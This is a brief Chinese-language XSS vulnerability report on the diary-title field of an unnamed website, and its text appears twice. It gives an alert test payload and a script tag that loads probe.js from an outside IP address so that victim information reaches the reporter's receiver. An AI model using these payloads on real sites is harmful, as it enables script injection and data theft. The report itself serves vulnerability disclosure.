某網(wǎng)站寫日記的標題處存在XSS
在標題處插入XSS代碼:<script>alert(1)</script>

1.png
點擊預(yù)覽,即可看到彈窗:

2.png
在標題處引入遠程js文件:<script src="http://123.206.93.11/probe.js"></script>
由于標題字數(shù)限制,script標簽不能完整閉合,但并不影響獲取信息:

3.png
點擊預(yù)覽,在接收端可以看到返回信息:

4.png
某網(wǎng)站寫日記的標題處存在XSS
在標題處插入XSS代碼:<script>alert(1)</script>
點擊預(yù)覽,即可看到彈窗:
在標題處引入遠程js文件:<script src="http://123.206.93.11/probe.js"></script>
由于標題字數(shù)限制,script標簽不能完整閉合,但并不影響獲取信息:
點擊預(yù)覽,在接收端可以看到返回信息: